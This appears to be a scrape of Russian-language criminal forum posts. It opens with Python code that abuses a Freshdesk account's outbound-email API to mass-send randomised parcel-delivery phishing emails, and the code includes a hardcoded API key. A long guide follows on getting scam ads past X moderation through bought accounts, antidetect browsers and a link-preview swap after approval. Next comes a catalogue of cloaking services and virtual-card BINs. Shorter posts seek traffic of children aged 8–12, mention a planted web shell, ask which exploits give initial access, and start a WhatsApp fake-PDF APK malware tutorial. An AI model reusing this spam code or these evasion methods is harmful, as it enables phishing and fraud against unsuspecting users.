ticket_info = ticket_response.json()
email_config_id = ticket_info.get('email_config_id')
group_id = ticket_info.get('group_id')
print(f"Email Config ID: {email_config_id}")
print(f"Group ID: {group_id}")
else:
print(f"Failed to retrieve ticket: {ticket_response.status_code}, {ticket_response.text}")
rate_limit_url = f"https://{domain}/api/v2/tickets"
rate_limit_response = requests.get(rate_limit_url, auth=auth)
if rate_limit_response.status_code == 200:
rate_limit_per_minute = rate_limit_response.headers.get('x-ratelimit-limit')
rate_limit_remaining = rate_limit_response.headers.get('x-ratelimit-remaining')
rate_limit_reset = rate_limit_response.headers.get('x-ratelimit-reset')
print(f"Rate Limit per Minute: {rate_limit_per_minute}")
print(f"Rate Limit Remaining in Current Window: {rate_limit_remaining}")
print(f"Rate Limit Reset Time (in seconds): {rate_limit_reset}")
else:
print(f"Failed to retrieve rate limit information: {rate_limit_response.status_code}, {rate_limit_response.text}")
Разные аккаунты, дают разный лимит.
После того как все хорошо, нашли подходящий аккаунт узнали нужную информацию
переходим ко второму коду.
Этот код будет отпавлять письма, совсем уж халявы не получиться надо данный
код подстраивать под каждый аккаунт в зависимости от того что именно требуется
отправлять, аттачи и так далее.
You must spend at least 60 day(s) on the forum to view the content.
Code:Copy to clipboard
import csv
import random
import requests
from requests.auth import HTTPBasicAuth
from concurrent.futures import ThreadPoolExecutor
import time
from collections import deque
from datetime import datetime
# Replace with your Freshdesk domain and API key
domain = "respshophelp.freshdesk.com"
api_key = "k9gmiYZS8oRbOc0leYI"
auth = HTTPBasicAuth(api_key, "X")
# Email config and group IDs
email_config_id = 66000073222
group_id = 66000086941
# Initialize a deque to track send times
send_times = deque()
links = [
"https://google.com",
"https://google.com"
]
def generate_random_style():
colors = [
'#0d6efd', '#6610f2', '#6f42c1', '#d63384', '#dc3545', '#fd7e14',
'#ffc107', '#28a745', '#20c997', '#17a2b8', '#007bff', '#6c757d',
'#343a40', '#f8f9fa', '#e9ecef', '#f5f5f5', '#dee2e6', '#ced4da'
]
fonts = [
'Arial', 'Verdana', 'Georgia', 'Tahoma', 'Trebuchet MS', 'Open Sans', 'Helvetica',
'Courier New', 'Lucida Console', 'Garamond', 'Palatino Linotype', 'Book Antiqua',
'Impact', 'Segoe UI', 'Roboto', 'Lato', 'Montserrat', 'Ubuntu', 'Nunito', 'Poppins'
]
padding = f"{random.randint(10, 30)}px {random.randint(20, 40)}px"
border_radius = f"{random.randint(5, 20)}px"
text_align = random.choice(['center', 'left', 'right'])
border_style = random.choice(['solid', 'dotted', 'dashed', 'double'])
border_width = f"{random.randint(1, 3)}px"
border_color = random.choice(colors)
box_shadow = f"0px {random.randint(1, 4)}px {random.randint(5, 15)}px rgba(0, 0, 0, 0.1)"
return {
'color': random.choice(colors),
'font': random.choice(fonts),
'padding': padding,
'border_radius': border_radius,
'text_align': text_align,
'border_style': border_style,
'border_width': border_width,
'border_color': border_color,
'box_shadow': box_shadow,
'button_bg_color': random.choice(colors),
'button_text_color': '#ffffff'
}
def fetch_ticket_type():
ticket_types = [
"Question", "Problema con datos inconsistentes y comunicaciones",
"Error del cliente", "Solicitud de modificación de sistema",
"Cliente solicita cambios (Versión, configuracion)", "Posnet, MPago y Hardware",
"Cerrado por estar duplicado", "Cliente consulta", "Reabierto",
"A revisar por Sistemas", "Error a corregir.", "Nueva instalación",
"Guardia", "Aplicaciones accesorias (Certif. FAE, WebHost, CaldenOn, TF, CVirtual)"
]
print("Available Ticket Types:")
for i, t_type in enumerate(ticket_types, start=1):
print(f"{i}. {t_type}")
choice = int(input("Select a ticket type by number: ")) - 1
return ticket_types[choice]
def create_beautiful_name(name):
return name.title() # Capitalizes the first letter of each word
def display_rate_limits(response):
rate_limit = response.headers.get('X-RateLimit-Limit')
rate_limit_remaining = int(response.headers.get('X-RateLimit-Remaining', '0'))
rate_limit_reset = response.headers.get('X-RateLimit-Reset')
print("Rate Limits:")
print(f"Rate Limit: {rate_limit}")
print(f"Rate Limit Remaining: {rate_limit_remaining}")
print(f"Rate Limit Reset: {rate_limit_reset}")
return rate_limit_remaining
def enforce_rate_limit(rate_limit_remaining):
global send_times
if len(send_times) >= 250:
print("Sent 200 emails. Waiting 1 minute before continuing...")
time.sleep(60)
send_times.clear() # Clear the deque after waiting
if rate_limit_remaining < 10:
print("Rate limit remaining is less than 10. Waiting 10 minutes before checking again...")
time.sleep(600)
def prompt_to_continue():
while True:
choice = input("No more emails in the file. Would you like to add more rows or stop the campaign? (add/stop): ").strip().lower()
if choice == "add":
return True
elif choice == "stop":
return False
else:
print("Invalid choice. Please enter 'add' or 'stop'.")
def send_email(row, group_id, email_config_id, ticket_type):
email = None # Initialize email variable
try:
email = row['email']
name = create_beautiful_name(row['name'])
address = row['adress'] if row['zip'] else 'N/A'
city = row['city'] if row['zip'] else 'N/A'
zip_code = row['zip'] if row['zip'] else 'N/A'
state = row['state'] if row['state'] else 'N/A'
country = row['country'] if row['state'] else 'N/A'
styles = generate_random_style()
# Randomly select a link from the list
selected_link = random.choice(links)
# Create a personalized subject
subject = f"{name}, Delivery parcel.."
# HTML email template with inline styles
html_template = f"""
<!DOCTYPE html>
<html lang="en">
<head>
"""
# Set the correct product vendor value
product_vendor = "Freshdesk" # Replace with the correct value as per your requirements
# Data for the outbound email
email_data = {
"email": email,
"subject": subject,
"description": html_template,
"priority": 1,
"type": ticket_type,
"group_id": int(group_id),
"email_config_id": int(email_config_id),
}
url = f"https://{domain}/api/v2/tickets/outbound_email"
# Sending the POST request to create the outbound email
response = requests.post(url, auth=auth, json=email_data)
# Display rate limits after sending each email
rate_limit_remaining = display_rate_limits(response)
if response.status_code == 201:
print(f"Outbound email sent successfully to {email}.")
send_times.append(datetime.now()) # Track the time this email was sent
# Enforce rate limit after sending the email
enforce_rate_limit(rate_limit_remaining)
else:
print(f"Failed to send outbound email to {email}: {response.status_code}, {response.text}")
except KeyError as e:
print(f"KeyError: Missing key {str(e)} in the CSV file for {email or 'unknown email'}.")
except Exception as e:
print(f"Error occurred for {email or 'unknown email'}: {str(e)}")
# Fetch ticket type
ticket_type = fetch_ticket_type()
# Path to your CSV file
csv_file_path = r'C:\Users\Administrator\Desktop\contacts.csv'
# Main loop to read the CSV file and send emails concurrently
while True:
with open(csv_file_path, mode='r', encoding='ISO-8859-1') as file:
csv_reader = csv.DictReader(file)
with ThreadPoolExecutor(max_workers=2) as executor:
futures = [executor.submit(send_email, row, group_id, email_config_id, ticket_type) for row in csv_reader]
# Ensure all threads are completed
for future in futures:
try:
future.result() # Re-raise any exception that occurred in the thread
except Exception as e:
print(f"An error occurred during execution: {str(e)}")
# Prompt to continue or stop when the end of the file is reached
if not prompt_to_continue():
print("Campaign stopped.")
break # Exit the loop if the user decides to stop
print("All emails processed.")
И не спрашивайте за инбокс....
Поработав с твиттером (он же Х) достаточно непродолжительное время, но весьма продуктивное в финансовом плане (постинг), у меня сложилось четкое мнение, что Х является огромным и интенсивнорастущим охотугодьем для добычи монеты (на равне с Google, где порог входа гораздо выше, коллеги рекомендуют без $10к даже не начинать), поэтому было решено побаловаться с Х ads. На дворе было начало лета, энтузиазма и времени было хоть отбавляй, поэтому начался необходимый ресерч. На просторах адекватной информации не нашлось, хотя я подписался на все телеграмм-каналы об арбитраже трафика, в надежде найти что- то годное. Псевдомануалы формата «Все о Х ads» говорили чуть больше, чем ничего. В общем все, что транслируется в открытом доступе, может быть не актуально даже для белых направлений.
Поискал и почитал на форуме, не сказать, что нашел кого-то, кто был готов делиться полезной информацией за «спасибо-пожалуйста». Покупать мануал за $500-$1000 тоже показалось плохой идеей. Поэтому было принято решение закатать рукава и самостоятельно начать тестить. Определился с бюджетом на тесты- эксперименты-развлекушки (в голове был готов к цифре около $2к). Забегая вперед – запустить и пролить таки получилось, поэтому устраивайтесь поудобнее, заваривайте чаю и поехали!
Начал с поиска аккаунтов Х. Шсток стал первым помощником. Накупил аккаунтов штук 20 у разных продавцов, начал разбираться - что же нужно для запуска рекламы? Для возможности запуска рекламы необходимо быть премиум пользователем, для оплаты лезет любая виртуалка с необходимой суммой (зависит от гео), в течение суток встает синяя галка. Пары неудачных попыток привязать карту для ads было достаточно, чтобы отказаться от этой затеи, ибо заниматься перебиранием бинов и партнерок посчитал контрпродуктивным и слишком времязатратным. Пошарил объявления о готовых аккаунтах, попробовал двух поставщиков (имен называть не буду, в дальнейшем П1 и П2). Первая пачка аккаунтов (4 акка) приобреталась у П1, акки с нфт- оформлением и наполнением. При продаже акков (П1) сразу было объявлено, что никаких консультаций по ads не предоставляется, давай деньги – держи акки, дальше сам. Для чистоты эксперимента 2 аккаунта запустил с мака, 2 с винды, антидетект использовал дельфин с соответствующими настройками, прокси асокс (отдельная прокся под каждый акк с разными гео). Дальше по мануалу: погрел аккаунты пару дней, на каждом выложил по нейтральному посту с картинкой, начал по очереди запускать ads. Все 4 аккаунта получили halted и прекрасную надпись "This account is ineligible to run X Ads due to a policy violation by one or more users "? в личном кабинете, без указания конкретных причин, апелляции не помогли, начал долбить в саппорт, на человека попасть практически невозможно, все через бота. Выбирал разные ветки Campaign Setup/Campaign results/Campaign Performance получал +- разные ответы с одним результатом.
Само собой больше никакой информации мне никто предоставлять не собирался, не считая того, что на получение ответа уходило до недели времени. Поразмыслив, отмел как причину качество аккаунтов и привязанных к ним карт, начал пенять на прокси и кривой прогрев. Поискал кто продает уже прогретые аккаунты под ads, наткнулся на П2. Аналогично закупил 4 аккаунта, для чистоты эксперимента прокси/антидетект/железо оставил прежние. Запустил рекламу с задержкой в пару часов с каждого аккаунта (акки ведь гретые уже). 3 аккаунта отлетели с аналогичной пометкой в личном кабинете « ineligible », но один схватился! Будучи не умея настраивать вообще ничего в ads и не владея инорфмацией о нюансах запуска, само собой совершил ошибку - не установил бюджет кампании, в связи с чем за ночь открутило белую на все шекели (лимит $200, но дает открутить +- на $160 после чего выставляет биллинг). Начался анализ этого аккаунта и действия с ним, параллельно долбежка в саппорт с остальных аккаунтов. На все акки ответ «** Your account has been deemed ineligible to advertise by our teams, with no recourse to appeal. We apologize for the inconvenience.** ».
Описав ситуацию П2, получил рекомендации попробовать другой антидетект и прокси. По совету поставил гологин, купил прокси тоже у П2, заказал еще 10 аккаунтов, но попросил парочку сделать не в крипто-тематике с нфт-аватарками, а с живыми лицами и на ИТ тематику. Пока готовились акки перечитал всю инфу на https://business.x.com/. Наткнулся на информацию, что публикация рекламы может быть отклонена из-за несоответствия содержания поста с общей тематикой и наполнением аккаунта. Получив аккаунты начал под каждый из них выбирать компании, которые есть в Х с золотой галкой. Репостить все их публикации за последний месяц + в био указывать, что являюсь сотрудников любого отдела с отсылкой на аккаунт Х данной организации + указывать в информации о вебсайте оригинальный домен. Белая схватилась на трех аккаунтах, дополнительно с одного получилось пробить « ineligible » через саппорт.
Белая полилась, а вместе с ней начались тесты с черной. На удивление черная проходила модерацию за 2-5 часов. Залив происходил на разные проекты, какие-то в течение нескольких часов сразу отлетели в бан, какие-то лились до отсечки.
Далее по схеме обрабатываем саппорт, только теперь не тыкаем бота, просим человека и включаем дурака, который первый раз пробует свои силы в ads. В общей массе безуспешно, но пришла инфа, что проблема все-таки в карте, типа привяжите другую и пересмотрим свое решение.
Донес инфу до П2, он подшаманил со своей стороны качество виртуальных карт под ads. Как результат из следующих 10 аккаунтов белая схватилась на 9, следом 6 из них пролили черную на разные проекты (достаточно успешно). Эти аккаунты тестировались уже по двум веткам: функционал самого Х ads (качество трафа, таргет, киворды, гео, лукэлайк) и границу бана.
Запуск рекламы (конкретно траф на вебсайт) можно осуществить 3 способами:
Крайне быстрый и эффективный метод для пробива белой, бывали случаи, что сначала начинало крутить, через полчаса уходила в pending на непродолжительное время, потом продолжала крутить дальше. Поэтому рекомендация на каждом аккаунте запускать белую этим методом. Почему же сразу не лить на черную спросите вы? А чтобы убедиться, что банят конкренто за чернуху и модифицировать при необходимости до нужного результата. Если белая едет, значит прогрев/привязанная карта/аккаунт в целом проходит модерацию, под вопрос встает только содержание контента.
Старт кампании можно выбрать здесь и сейчас, можно выбрать конкретное время, когда вам необходимо пролить. Не совсем полезная штука, потому что сама кампания проходит модерацию в диапазоне от нескольких часов (если все сделали правильно и с аккаунтом все в порядке) до нескольких дней (будут просто держать вас на пендинге, не отвечая при этом в саппорте). Поэтому если вам необходимо запуститься в определенное время лучше начать публиковаться за пару дней, как схватится - выставлять на минимум дейлик, ждать час пик и выкручивать на полную. Конец кампании роли особо не играет, была теория, что если выставить один день или пару часов, то открутит быстрее. Но на деле оказалось, что как только вы дейли выкручиваете на максимум, при наличии необходимого количества аудитории открутит на все бабки за пару часов.
Ниже выбираем Link clicks. С рекомендуемым «посещением сайта» даже не стал заморачиваться, потому что необходимо пиксель от Х пихать в код сайта для аналитики. Из стратегий можете выбрать любую, в целом зависит от того сколько кликов и какого качества хотите получить. На практике «авто» выдает больше всего кликов, при условии, что нет таргета по гео и языку, будет вам стоимость клика 0,15-0,2$/клик. Во втором варианте можно выбрать стоимость клика диапазон 0,7-3,5$/клик, выбирал минимум/максимум, по качеству не смог отследить, ставил просто в районе 1$. Третий особо не использовал, разницы со вторым вариантом не почувствовал. Ниже выбирал платить за клики, а не за просмотры, так как бюджет ограничен. Если ставить 1$ за клик, то на 150$ примерно столько же кликов и получите. Чтобы эти цифры что-то значили, необходимо с одного аккаунта пополнять счет и отливать на 1000-2000$, тогда разница будет. На impression кликов получите гораздо больше, но не целевых. Это основное, что необходимо настроить при запуске, ибо после старта вам не дадут вносить изменения только в этой части.
В Placements при любых раскладах убираем комментарии. В Х подключена монетизация, если у аккаунта больше 500 подписчиков и больше 5 миллионов просмотров за последнее время, то в такой аккаунт будут пихать рекламу внутрь контента (в основном в комментарии). Практика показала, что боты тыкают на линк, за него списывают деньги, но он даже не долетает до домена. Приносит радость только количество кликов. Из них только 20-25% относительно живых кликов.
Ниже выбираете за что хотите цепляться при поиске. Пробовал только Keywords, Follower look-alikes, Interests. Для запуска грязи лучше вообще ничего не ставить, чтобы не триггерить модерацию. В дальнейшем с ключами аккуратней (об этом говорил выше), с интересами тоже крипту особо не раскачаешь, можно игроманов цеплять и трейдеров, но вот более менее продуктивно показал себя только поиск Follower look-alikes - показывает рекламу людям, кому нравится конкретный аккаунт (сюда уже ехали все проекты и криптоинфлюенсеры).
Последние нижние функции мне были не нужны. Оптимизированный таргетинг не использовал почти, чтобы можно было чище отследить результативность своих настроек.
В правом нижнем углу жмите Next и вас перенесет на публикацию самого объявления. Чтобы создать объявление, нужно сначала залить медиафайлы в определенном формате через панельку ads, в какой-то момент меня крайне выбесило подгонять картинки по размеру, дополнительно ко всему в этом методе можно впихнуть ссылку на блек в текст рекламы, но также надо указать ссылку в графе URL (куда блек уже не засунешь), практика показала, что мои домены не проходят модерацию через URL (по всей видимости после работы коллег на новый год, ужесточилась модерация ссылок). Но мне по итогу она и не нужна была. В правом верхнем углу нажимаете Use existing ad , открывается модальное окно с опубликованными твитами, выбираете необходимый. После выбора что мы видим? Так у нас выглядит текст твита:
А так мы видим его в ленте (ссылки нет, есть кликабельное изображение с доменом ресурса и описанием):
Собственно таким он отображается и в рекламе:
Нет надобности возиться с медиа и думать как пропихнуть ссылку. Конкретно этот аккаунт был одним из тех, на котором тестировалась и пробивалась белая. Что нам дает такой способ публикации твитта в ads? Во-первых, твит сначала у себя в профиле на стене проходит менее сложную модерацию (на ссылку, текст, медиа), во-вторых я смог спуфить оригинальные ссылки и превьюмедиа с них. Пример: В тексте ссылка на блек, но Х видит ее как ссылку [статьи](https://blog.pancakeswap.finance/articles/pancake-swap-ambassador- program-expansion-introducing-pancake-lords), откуда домен, описание и картинка подтягиваются напрямую.
На время модерации все кликнувшие по ссылке попадают на статью, но как только модерация пройдена и полилось – переключается рубильник и каждый следующий, перешедший по ссылке, попадает на нужный нам адрес, а реклама дальше продолжает транслироваться без необходимости повторной модерации. Практика показала, что если нет жалоб от других пользователей, то реклама с блеком крутит пока деньги не закончатся. Из минусов Х проводит чистку примерно раз в неделю и перезапрашивает инфу по ссылкам, подгадать время проверки даже не пробовал, понял, что легче еще раз выкладывать плюс минус аналогичный пост с новой ссылкой и лить дальше. Пара примеров:
За весь опыт работы самостоятельно трафик лил только в бурной юности, обычно
сотрудничаю с опытными и умелыми траферами, забирая на себя и свою команду всю
техническую часть (в том числе разработка и интеграция софта), но этим летом
было непреодолимое желание самому - как говориться пощупать траф, хотя если
быть честным - в основном интерес был подкреплен найденным спуфом и получением
удовольствия от эксплойта систем Х. Описание данного опыта является
субъективным, а сам опыт приобретался в развлекательных целях, поэтому ни в
коем случае не претендую на уровень Эксперт в области трафика, если вдруг на
момент публикации что-то сильно в Х изменилось, и приведенные здесь методы и
техники больше не работают, прошу не принимать близко к сердцу!
На сегодня все, уважаемые форумчане! У кого появились вопросы – задавайте,
кому было полезно – реагируйте. Всем удачной и продуктивной охоты.
Собрал небольшой список (линков) из основных и достаточно популярных инструментов, которыми пользуется большинство вебмастеров. Данная тема создана в информативных целях. В этой теме хотел бы выделить 3 самых важных инструмента:
Антидетект браузер.
Антидетект браузер — это инструмент, который позволяет создавать изолированные среды просмотра веб-сайтов с собственным уникальным цифровым отпечатком в соответствии с требованиями пользователя.
В чем заключается его функциональность и зачем его использовать?
Выбор антидетект-браузера зависит от ваших потребностей и бюджета. Обратите внимание на цену, количество профилей, совместное использование и другие характеристики при выборе подходящего инструмента.
Популярные антидетект браузеры :
Тарифы:
- Free: бесплатно (до 10 профилей);
- Base: $89/месяц (до 100 профилей);
- Team: $159/месяц (до 300 профилей);
- Enterprise: от $299/месяц (можно выбрать количество профилей).
Тарифы :
- Pure: 30$/месяц (10 профилей)
- Light: 90$/месяц (100 профилей)
- Pro: 160$/месяц (300 профилей)
- Premium: 300$/месяц (1000 профилей)
Тарифы :
- Starter: 29€/ мес. (10 профилей)
- Base: 79€/ мес. (100 профилей)
- Team: 169€/ мес. (350 профилей)
- Advanced: 329€/ мес. (1200 профилей)
План:
- Solo: €99/месяц (до 100 профилей)
- Team: €199/месяц (до 300 профилей)
- Scale: €399/месяц (до 1000 профилей)
Тарифы :
- Micro: $29/мес. (10 сессий)
- Base: $79/мес. (150 сессий)
- Middle: $189/мес.(500 сессий)
- Team: $389/мес.(1500 сессий)
Клоака.
Клоакинг (от английского “cloaking” — “маскировка, прикрытие”)
Его используют, чтобы скрыть от поисковых систем нежелательный или запрещённый
контент, например, рекламу товаров для взрослых или мошеннические схемы.
При этом обычные пользователи и поисковые боты при посещении одной и той же
страницы видят разную информацию.
Adspect - непробиваемый сервис клоакинга для любых рекламных платформ.
Тарифы :
- Персональный - 499$/Месяц
- Профессиональный - 999$/Месяц
Тех. Поддержка :
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FVwBAG998bvgwXnvKbq61Ky9D4hd7wuiTdSJNmDRh6P_M3eaB1Yb7_2mvElXdvt9iF5hbCGVakzljQaNqCbG0MlVwr3Q-IGC4eRk1A_jVAawJVwC8ucp7WLiaMvWzdrGMjW56egUYjQ7ikFjpiTW41B6xlL62wRO3oavaEqDF06uL8W9pgkkvJ8y98kOZbmLKJowDupdEoUX8WUxAvBsIIuPhayicEPmtMZ9LmFl5P2NjOP3ywADistmutSwV_bTvbD60pPgcLGdn- Ly_kX5xWSyXvJnQSWWhwBE7W4nVdW5I1NtoYZ7033KfeKdWuJE3R_XBXayPbTeT2KzyIobtsQ.jpg&hash=311aea876c3ccb177cc3899418b2e8bb&return_error=1)
adspect.io / adspect.ai – cloaker for Google, Facebook, TikTok, Bing, X, Yandex, and more. Marketing: @adspect_marketing
t.me
Hide.click - Профессиональное решение для фильтрации трафика и защиты контента на основе Machine Learning
Тарифы :
- Standard - 145$/Мес.
- Advanced - 245%/Мес.
- Professional - 1945$/Мес.
Тех. Поддержка :
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2Ff0uPiPJXUeC0v2D75rodxxghNNlUIqaGkku8vhMYKZHAvF0r6QOcwyzh6bwFfoI0XuUTQwZb87fDgyI4KbqeYiKdh5ZqG- QYzzxKUvBDFBtrhE9ugH5xHefP9nJtYIIXJS_nftrcnWCxLnrUh_1HMv9lEXv1q-tUl0QNoXVQlKOcM2Ea_odwwt1MvLqNXh74sXKEMaNqakdZaZGADJoLT7yEYLEem_CSFNkGxqfuj4SSI2MnOErCWKah6WnFAEJaAp8gzBdkbOdv_NYr- t- oxfEchlDI3TEu_Do9We-T6OYZ31NMT8pG4RceBhdDbGoqXl3CAMgoWhBf4CoZ0VI3cQ.jpg&hash=43e3df6845f6c906d628f3a9e73e1219&return_error=1)
Hide.click - cloud traffic filtration and content security solution.
t.me
Bhole.space - простая облачная клоака. От регистрации до запуска кампании всего несколько шагов.
Тарифы :
- 7days (недельный тариф) - $8.5 (10 domain)
- Standard - $25 (10 domain)
- Premium - $50 (50 domain)
Тех. Поддержка :
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FFScG7yOuaWQL8-JRGXiPSS_brT- nfDXHBPjr26uUhQvwKKSJoypnwEAwATqNV_NIeQ3jHTG2p1YH0eQbPVC24osqvHCF2BkjlE47-zsJFzByz5ntjT5_cuH4RFhZcEqBVW_w1w6tb7MYZXn4vuuEJrMAv- SOyusaEiYAZlwKc_YHed0zQzNTQ0cgP0k7iWD8F3V6GIQU9gN-X9thIPbG4KVrBqfNMrstEXYD0-V4eyk6H32CsA0_95-tkMjuMHCex2NpLFw9JeH- OqTjDsZKCB4HUT5RZihsabHtYYiSqvNmlID2V9feyiiogpeULuQxpy1OtG7vNTuaTutxRiA1Kw.jpg&hash=56836146c97d4db80f2b100f0251f17b&return_error=1)
](https://t.me/blackholechat)
Облачный монстр в мире клоакинга. Попробуй в 2 клика bhole.space
t.me
Cloaking.house - Это облачный сервис, вам не нужно покупать свой сервер и устанавливать софт. Защищат ваш сайт от ботов, модеров, спай сервисов, конкурентов и любого нежелательного трафика.
Тарифы :
- Начальная: 30$/месяц
- Базовая: 100$/месяц
- Премиум: 200$/месяц.
Поддержка :
YlePVSTEqIbCqUXPB2p5HOKxJjt082264ij3VOAHyAf9ntJl6pVJM37ZHlLSRqiadLwQiSAliLYd0pExqplkc_7xms4cioAYtL5jyfMXa2r0WoZe21JR2xMt5buhzYbHEA- RzcfLVt0EzIvJgvPu6e3d31OUzEa- Ix8H6KqDfP8A7f_4bkqKsdDKckWBw.jpg&hash=22b04b5e4a2ad4e0fd6e28ae95ef0cc5&return_error=1)
Cloaking.House - Топовый сервис фильтрации трафика и клоакинга Facebook, Google, TikTok. @Vladislav_Cloaking_House @Andrew_Cloaking_House
t.me
Cloakit.pro - Облачный сервис клоакинга . Актуальная база ботов, VPN и прокси. Возможность A/B тестирования. Интеграция с трекерами.
Тарифы :
- Start: $100/месяц.
- Basic: $200/месяц.
- Premium: $400/месяц.
Тех поддержка :
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FeDvVzqBqdhIHUK8zoKZFJDqXH4wG7FcS75j0twIzh46rQ1jHcNXtwJ8xSjdN_IMUpv_jJwVNheiJCkCrLqY8We5Zmz8KC5ykIb6TrJK2eq0ynB3pAhPPSbKOcliFokwoElyShfZZoeDUgVFIZ6pJMLUu358BBKLuNwdZ3BB4gQLO5yxzN4tajcLRmzSjXLKloDk7fIZu3Wox5y8zPxDCjqHgBhhERN7np24NdTdIJivKc6Jk9fjyiCbV7R0OlT93lqpK65TcR_rqvChNByeM0t1IZMDW0f5mSOSonO0z8V6TjXzFZKmP4-1OlgeZkC54eQfu0yBvSMqjLvGQVjifbA.jpg&hash=dc4c6c92b1bdd31cf65543a849809d0a&return_error=1)
Official Support
t.me
Платежные сервисы.
Платежные карты - необходимый инструмент для каждого вэба. Они нужны
для оплаты/подписки/списания средств
в разных источниках трафика. А также, нужно понимать, что это расходник. Они
нужны в большом количестве на постоянной основе.
В частности для команд, которые запускают большое кол-во рекламных компаний.
Карты:
Комиссии:
Пополнение:
минимальное пополнение 30$
WIRE пополнение от 5000 $
Комиссия 1% пополнение через WIRE
весь функционал сайта в TG боте
Вывод от 100$ +10%
Карты:
Соединенные Штаты Америки - USD карты.
Odin
(prepaid)
- Комиссия за транзакцию в USD 2%
- Комиссия за транзакцию в других валютах 2,2%
Loki (prepaid)
Skadi (credit)
Titan (credit)
Nyx (credit)
Zeus (credit)
Bragi (prepaid)
Mars (credit)
Doom (credit)
Dazzle (credit)
Mirana (credit)
Medusa (credit)
Выпуск карты $2
Комиссия за транзакцию 2%
Tusk (credit)
Slardar (credit)
- Выпуск карты $3
- Комиссия за транзакцию 2%
- Дополнительная комиссия за международные транзакции 3%
Эстония - EUR карты.
EUR EST
Vidar (debit)
- Выпуск карты €2
- Комиссия за транзакцию в EUR 0%
- Комиссия за транзакцию в других валютах 2%
USD EST
Magnus (debit)
- Выпуск карты $2
- Комиссия за транзакцию в EUR 2%
- Комиссия за транзакцию в других валютах 4%
Турция - EUR карты.
EUR
Freya (prepaid)
- Выпуск карты €2
- Минимальная комиссия за транзакцию €0,5 для транзакций до €30
- Комиссия за транзакции выше €30 1,4% от суммы
Пополнение :
_Первое пополнение на сумму до $5к - без комиссии (только 2 USDT), все последующие вне зависимости от суммы - 3% + 2 USDT.
Есть лимиты на создание карт.
Для новых аккаунтов с 1 депозитом можно только 10 карт открыть, после второго
депозита ограничения снимаются. Или, как вариант, пополниться сразу на сумму
которая равна или больше суммы 2-х минимальных депозитов (т.е. от 400$+ суммы
пополнения, лимиты снимаются)._
Карты:
Geo EU, бин (474366)
- выпуск карты 2,5 € (единоразово, без дальнейшего обслуживания)
- комиссия с каждой транзакции 4%
- комиссия за отмену платежа 0,3 €
- если вы выберете валюту, отличную от валюты карты, с вас будет взиматься
комиссия за конвертацию в размере 2% за каждую транзакцию.
Geo EU, бин (474362)
- выпуск карты 2,5$ (единоразово, без дальнейшего обслуживания)
- комиссия с каждой транзакции 4%
- комиссия за отмену платежа 0,3$
- если вы выберете валюту, отличную от валюты карты, с вас будет взиматься
комиссия за конвертацию в размере 2% за каждую транзакцию.
Geo EU, бин (474362)
- выпуск карты 2,5 £ (единоразово, без дальнейшего обслуживания)
- комиссия с каждой транзакции 4%
- комиссия за отмену платежа 0,3 £
- если вы выберете валюту, отличную от валюты карты, с вас будет взиматься
комиссия за конвертацию в размере 2% за каждую транзакцию.
USA, бин (521747)
- выпуск карты 2,5 $ (единоразово, без дальнейшего обслуживания)
- комиссия с каждой транзакции 4%
- комиссия за отмену платежа 0,3 $
Если вы тратите от 500$ в месяц, мы можем снизить стоимость карт до 1 $/€/£ и открыть дополнительные бины:
USA, бин (486699)
- выпуск карты 1$ (единоразово, без дальнейшего обслуживания)
- комиссия с каждой транзакции 4%
- комиссия за отмену платежа 0,3$
- при совершении транзакции на сумму в эквиваленте менее 10$ взимается
дополнительная комиссия: если валюта USD - 0.2$, если другая валюта - 0.6$.
USA, бин (534271)
- выпуск карты 1$ (единоразово, без дальнейшего обслуживания)
- комиссия с каждой транзакции 4%
Пополнение:
Пополнить аккаунт можно с помощью USDT без комиссии, минимальный депозит 100$.
Webscard - сервис виртуальных дебетовых карт с эксклюзивными бинами Европейских и Азиатских банков для оплаты рекламы, покупок в интернет магазинах, SaaS сервисов: Facebook Ads, Google Ads, Steam, PSN и др.
Собственный препроцессинг карт
Собственный крипто-процессинг
Счета в Европейских и Азиатских банках
Надежность сервиса
Карты:
HK, бин (472593)
UK, бин (534094)
UK, бин (511023)
- Комиссия за выпуск карт - отсутствует ;
- Комиссия за обслуживание - отсутствует ;
- Безлимитное кол-во карт для выпуска ;
- Комиссии от 0,2 до 0,5 цент в зависимости от Bins и суммы транзакции ;
- Лимит на транзакцию 30000$ ;
- Ежемесячный лимит 200000$ ;
- Кол-во транзакций - без ограничений.
Пополнение:
_Пополнить аккаунт можно с помощью USDT (4%); SEPA (3.5%); WIRE (3.5%).
Комиссия за вывод средств – отсутствует._
Кто заинтересуется каким либо сервисом, рекомендую обращаться в саппорт при возникновенииинтересующих** у вас вопросов.
Данная информация актуальна на 30.04.2024.**
Актуально ли это? есть ли статьи на эту тему? На exe с ленда планировал бы.
Если не тяжело ответьте по братски плиз
Народ, всем привет, подскажите свежие статейки где почитать как работать с
логами!
В сети полно инфы, но она за частую вся уже устаревшая и не рабочая.
Либо не полностью раскрывает тему, начал изучать тему, но очень много
пробелов.
Можно в личку, если не хотите пиарить другие борды.
Нужен трафик детей 8-12 лет
Под белое, не снг (EU)
Интересно где можно взять такой вид трафа и как можно будет его автоматизировать, оптимизировать, делегировать ?
Если у вас в голове возникли какие то мысли, то знайте, я на стороне Максима Марцинкевича
У меня есть вебшелл на сайте, и я могу загружать туда файлы. Я хотел бы, чтобы Google, Яндекс и другие поисковые системы, а также сам домен, были заблокированы через ICANN. Как я могу это осуществить?
Такой вопрос через что сейчас доступы добывать для учебе пробывал Team City но это там ничего интересного не нахожу кроме соседей))). А вот с фортиками цисками не понял везде одни POC и как их дорабатывать не понятно может кто направить в правильное русло буду благодарен так как это первая проблема сейчас.Так как понимаю основы внутрянки но не могу попрактиковатся кроме как на виртуалках(((.А Team city 3 хоста и все что там кроме как дедик себе делать или майнер ставить не понятно ну исходники поворовать какие то.Может старые сплоиты еще отрабатывают и если у кого есть опыт прошу поделитесь так.
Тут видео как работает и тут взято, не реклама, сюда видео не могу закинуть.
https://t.me/hacklair_Official/29
Вредоносное ПО для Android (.apk) может распространяться через поддельный PDF- документ, манипулируя расширением файла в приложении WhatsApp. Доказательство концепции (PoC) доступно в этом репозитории.
Шаг 1:
Сначала создайте бесплатную учетную запись на
https://user.ultramsg.com/signup.php. Мы будем использовать её для
управления API.
Шаг 2:
